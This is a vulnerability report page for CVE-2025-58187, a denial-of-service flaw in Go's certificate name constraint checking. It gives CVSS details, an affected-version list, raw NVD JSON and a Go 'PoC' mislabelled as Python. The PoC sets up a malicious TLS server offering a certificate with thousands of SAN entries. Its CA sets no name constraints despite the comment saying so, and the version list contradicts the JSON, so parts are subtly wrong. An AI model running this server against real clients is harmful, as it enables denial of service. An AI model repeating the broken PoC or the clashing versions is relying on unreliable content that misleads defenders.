Security Vulnerability Report
中文
CVE-2025-58187 CVSS 7.5 HIGH

CVE-2025-58187

Published: 2025-10-29 23:16:20
Last Modified: 2026-01-29 16:02:27
Source: [email protected]

Description

Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate. This affects programs which validate arbitrary certificate chains.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:golang:go:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:golang:go:*:*:*:*:*:*:*:* - VULNERABLE
Go < 1.22.11
Go < 1.23.x (before 1.23.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-58187 PoC - Denial of Service via Malformed Certificate Chain // This PoC demonstrates the non-linear name constraint checking behavior package main import ( "crypto/rand" "crypto/rsa" "crypto/tls" "crypto/x509" "crypto/x509/pkix" "encoding/pem" "math/big" "net" "time" ) func generateMaliciousCertificate() (*tls.Certificate, error) { // Generate CA key caKey, err := rsa.GenerateKey(rand.Reader, 2048) if err != nil { return nil, err } // Create CA certificate with name constraints caTemplate := x509.Certificate{ SerialNumber: big.NewInt(1), Subject: pkix.Name{ CommonName: "Malicious CA", }, NotBefore: time.Now(), NotAfter: time.Now().Add(365 * 24 * time.Hour), KeyUsage: x509.KeyUsageCertSign, BasicConstraintsValid: true, IsCA: true, } caCertDER, err := x509.CreateCertificate(rand.Reader, &caTemplate, &caTemplate, &caKey.PublicKey, caKey) if err != nil { return nil, err } // Generate malicious leaf certificate with many SAN entries leafKey, err := rsa.GenerateKey(rand.Reader, 2048) if err != nil { return nil, err } leafTemplate := x509.Certificate{ SerialNumber: big.NewInt(2), Subject: pkix.Name{ CommonName: "target.example.com", }, NotBefore: time.Now(), NotAfter: time.Now().Add(365 * 24 * time.Hour), ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, BasicConstraintsValid: true, } // Add thousands of SAN entries to trigger non-linear processing for i := 0; i < 10000; i++ { leafTemplate.DNSNames = append(leafTemplate.DNSNames, string(rune('a'+i%26)) + ".example.com") } leafCertDER, err := x509.CreateCertificate(rand.Reader, &leafTemplate, &caTemplate, &leafKey.PublicKey, caKey) if err != nil { return nil, err } return &tls.Certificate{ Certificate: [][]byte{leafCertDER, caCertDER}, PrivateKey: leafKey, }, nil } func main() { cert, err := generateMaliciousCertificate() if err != nil { panic(err) } // Start malicious TLS server listener, err := tls.Listen("tcp", ":8443", &tls.Config{ Certificates: []tls.Certificate{*cert}, }) if err != nil { panic(err) } defer listener.Close() // Wait for connections for { conn, err := listener.Accept() if err != nil { continue } conn.Close() } } // Client-side trigger code: // When a Go client connects to a server presenting this certificate chain, // the x509 certificate validation will consume excessive CPU time // due to the non-linear name constraint checking algorithm.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58187", "sourceIdentifier": "[email protected]", "published": "2025-10-29T23:16:19.643", "lastModified": "2026-01-29T16:02:27.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate. This affects programs which validate arbitrary certificate chains."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.24.9", "matchCriteriaId": "C89AAA9E-5381-4C85-836A-04FD377BA155"}, {"vulnerable": true, "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.25.0", "versionEndExcluding": "1.25.3", "matchCriteriaId": "37360D5C-FBAB-40DE-8397-F84D46242AF4"}]}]}], "references": [{"url": "https://go.dev/cl/709854", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://go.dev/issue/75681", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI", "source": "[email protected]", "tags": ["Mailing List", "Release Notes"]}, {"url": "https://pkg.go.dev/vuln/GO-2025-4007", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/08/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.